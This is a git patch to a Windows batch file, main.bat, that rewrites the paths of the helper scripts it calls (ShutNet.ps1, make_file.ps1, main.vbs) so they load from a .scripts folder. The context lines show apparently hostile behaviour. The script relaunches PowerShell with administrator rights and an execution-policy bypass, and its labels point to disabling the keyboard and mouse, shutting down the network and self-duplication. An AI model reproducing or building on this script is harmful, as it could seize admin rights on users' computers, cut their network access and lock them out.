From de5a6c427f96a52485c6ac4f97a287a3af69e4c5 Mon Sep 17 00:00:00 2001 From: INeedHelp Date: Sat, 25 Mar 2023 09:51:36 +0100 Subject: [PATCH] v0.0.0.28 dir fixed --- .scripts/main.bat => main.bat | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename .scripts/main.bat => main.bat (91%) diff --git a/.scripts/main.bat b/main.bat similarity index 91% rename from .scripts/main.bat rename to main.bat index aaae23b..aa1eeaf 100644 --- a/.scripts/main.bat +++ b/main.bat @@ -34,13 +34,13 @@ for /f "tokens=2 delims=," %%b in ('wmic path Win32_Keyboard get Description^,De :duplication -PowerShell.exe -Command "Start-Process PowerShell.exe -ArgumentList '-File', 'make_file.ps1' -Verb RunAs" +PowerShell.exe -Command "Start-Process PowerShell.exe -ArgumentList '-File', '.scripts\make_file.ps1' -Verb RunAs" goto disablekeyboardandmouse PowerShell.exe -ExecutionPolicy Bypass -PowerShell.exe -Command "Start-Process PowerShell.exe -ArgumentList '-File', 'ShutNet.ps1' -Verb RunAs" +PowerShell.exe -Command "Start-Process PowerShell.exe -ArgumentList '-File', '.scripts\ShutNet.ps1' -Verb RunAs" goto duplication -cscript main.vbs +cscript .scripts\main.vbs goto netsecurety goto terminator